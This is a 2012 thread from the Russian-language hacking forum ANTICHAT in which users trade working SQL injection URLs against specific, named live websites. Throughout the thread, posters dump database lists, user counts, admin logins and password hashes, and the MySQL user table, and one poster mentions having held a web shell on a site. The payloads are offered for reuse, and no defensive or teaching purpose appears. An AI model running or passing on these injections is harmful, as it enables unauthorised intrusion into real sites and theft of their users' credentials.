ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
27.04.2012, 18:12
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Так как спустя полгода мой шелл снесли, выкладываю в паблик
Крупный музыкальный портал (типа zay[antigoogle]cev.net)
www.bia2.com
PR = 5
Inject
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]_ttp[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.bia2.com/horoscopes/horoscopes_today.php?id=99+and+1=2+union+select+null,null,null,null,null,@@version,null,null,null,null,null,null,null,null[/COLOR][/COLOR]
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]_ttp<font color="Orange">Current User: root@50.97.140.227
Sql Version: 5.0.77
Current DB: soltan_horoscope
Data Bases:
<div style="margin:20px; margin-top:5px">
<div class="smallfont" style="margin-bottom:2px">Код:</div>
<pre class="alt2" dir="ltr" style="
margin: 0px;
padding: 6px;
border: 1px inset;
width: 640px;
height: 290px;
text-align: left;
overflow: auto">Code:
information_schema
mysql
nyre
r1soft_saved_database_XzZYj0
r1soft_saved_database_aGNipq
soltan_bia2
soltan_horoscope
soltan_ivbd1
soltan_jokes
soltan_mp3
soltan_music
soltan_pourya
soltan_prankcalls
soltan_review
soltan_users
soltan_video</pre>
</div>Немного о вкусняшках;
1) БД юзверей - около 35к
</font>[COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.bia2.com/horoscopes/horoscopes_today.php?id=99+and+1=2+union+select+null,null,null,null,null,%28SELECT+count%28*%29+FROM+%60soltan_ivbd1%60.ibf_members%29,null,null,null,null,null,null,null,null[/COLOR][/COLOR]
2) БД юзверей - около 72к
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]_ttp[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.bia2.com/horoscopes/horoscopes_today.php?id=99+and+1=2+union+select+null,null,null,null,null,%28SELECT+count%28*%29+FROM+%60soltan_users%60.users%29,null,null,null,null,null,null,null,null[/COLOR][/COLOR]
[/COLOR] |
|
|
28.04.2012, 01:49
|
|
Guest
Сообщений: n/a
Провел на форуме:
28145
Репутация:
-5
|
|
Так и не смог прочитать данные с таблицы gulfcoas_s9y кто розобрался стучите 477080587 буду рад поучится.
Сообщение от None
http://www.gulfcoastmag.org/index.php?n=3&si=-46+union+select+1,2,3,group_concat(schema_name+sep arator+0x3C62723E),5,6,7,8,9+from+information_sche ma.schemata--
http://www.gulfcoastmag.org/index.php?n=3&si=-46+union+select+1,2,3,group_concat(table_name+sepa rator+0x3C62723E),5,6,7,8,9+from+information_schem a.tables+where+table_schema=0x67756C66636F61735F67 756C66636F6173--
http://www.gulfcoastmag.org/index.php?n=3&si=-46+union+select+1,2,3,group_concat(column_name+sep arator+0x3C62723E),5,6,7,8,9+from+information_sche ma.columns+where+table_name=0x617574686F7273--
http://www.gulfcoastmag.org/index.php?n=3&si=-46+union+select+1,2,3,group_concat(author_first+se parator+0x3C62723E),5,6,7,8,9+from+authors--
Ну а вот сюда не пускает жду пояснений))
Сообщение от None
http://www.gulfcoastmag.org/index.php?n=3&si=-46+union+select+1,2,3,group_concat(password+separa tor+0x3C62723E),5,6,7,8,9+from+serendipity_authors--
|
|
|
|
28.04.2012, 08:33
|
|
Guest
Сообщений: n/a
Провел на форуме:
290351
Репутация:
173
|
|
http://all-abc.ru/
тиц 30
трафа 2К
Сообщение от None
http://all-abc.ru/?a=-1%27/**/or/**/%28select/**/count%28*%29from%28select/**/1/**/union/**/select/**/2/**/union/**/select/**/3%29x/**/group/**/by/**/concat%28mid%28%28select/**/table_name/**/from/**/information_schema.tables/**/limit/**/81,1%29,1,64%29,floor%28rand%280%29*2%29%29%29/**/and/**/%271%27=%271
|
|
|
|
28.04.2012, 17:30
|
|
Guest
Сообщений: n/a
Провел на форуме:
103014
Репутация:
76
|
|
Любителям коллекционировать юзверей.
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.oesworld.com/EbosRegister_cand.php?JID=-1+union+select+1,2,count(*)4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+users--[/COLOR][/COLOR]
|
|
|
|
28.04.2012, 19:21
|
|
Guest
Сообщений: n/a
Провел на форуме:
74477
Репутация:
21
|
|
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.club-beat.com/print.php?what=article&id=-564+union+select+1,2,group_concat(nick,0x3a,pass),4,5,6,7,8,9+from+admins+--+[/COLOR][/COLOR]
PR=3
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.academia.pan.pl/dokonania.php?id=-564+union+select+1,2,3,4,group_concat(r_id,0x3a,r_nick,0x3a,r_email,0x3a,r_pass),6,7,8,9,10,11,12,13,14,15,16,17+from+admin_redaktorzy+--+[/COLOR][/COLOR]
PR=4
одминка http://www.academia.pan.pl/cms/ |
|
|
|
28.04.2012, 23:57
|
|
Guest
Сообщений: n/a
Провел на форуме:
28145
Репутация:
-5
|
|
DataBases
information_schema
generator
hofmann
hofmann_20110327
hofmann_latin1
hofmann_supermailer
hofmanntest2
hofmannumfrage
myadmin
mysql
test
twig
Inject
Сообщение от None
http://www.hofmannmarking.de/ru/tmpl_produkt.php?prodnr=-15+union+select+group_concat(schema_name+separator +0x3C62723E)+from+information_schema.schemata
Сообщение от None
http://www.hofmannmarking.de/ru/tmpl_produkt.php?prodnr=-15+union+select+group_concat(User,0x3a,Password+se parator+0x3C62723E)+from+mysql.user--
|
|
|
|
29.04.2012, 00:06
|
|
Guest
Сообщений: n/a
Провел на форуме:
28145
Репутация:
-5
|
|
Bases
u72568
u72568_2
u72568_3
u72568_4
u72568_blog
u72568_interview
u72568_press
u72568_proiz
u72568_testdrive
Сообщение от None
http://www.pushcar.ru/news/auto/news.php?id=-1366+union+select+1,2,3,4,5,6,7,group_concat(schem a_name+separator+0x3C62723E),9,10,11,12+from+infor mation_schema.schemata--
|
|
|
|
29.04.2012, 00:12
|
|
Guest
Сообщений: n/a
Провел на форуме:
28145
Репутация:
-5
|
|
боянчик)
http://drive-penza.ru/index.php?get=13&model=-71+union+select+1,2,3,4,5,6,group_concat(schema_na me+separator+0x3C62723E),8,9,10,11,12+from+informa tion_schema.schemata--
|
|
|
|
29.04.2012, 00:19
|
|
Guest
Сообщений: n/a
Провел на форуме:
103014
Репутация:
76
|
|
Пафосный пользователь сайта на бесплатном хостинге. Улыбнул.
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.appnaeducation.com/edu/?loc=view&act=app&jid=-53+union+select+1,2,3,4,5,concat_ws(0x03a,USERNAME,PASSWORD),7,8,9,10,11,12,13,14,15,16,17+from+users+where+UID=13--[/COLOR][/COLOR]
|
|
|
|
29.04.2012, 05:19
|
|
Участник форума
Регистрация: 11.05.2008
Сообщений: 202
Провел на форуме:
420713
Репутация:
104
|
|
нашел
Сообщение от None
http://www.jetskiworld.gr/touring_eng.php
?id=1031 union select 1,2,3,concat_ws(0x3a,username,password),5,6,7,8,9, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,1,2,3 ,4,5,6,7,8,9,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25,1,2,3,4,5,6,7,8,9 from 331329_jetskiworld.ecsusers --
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
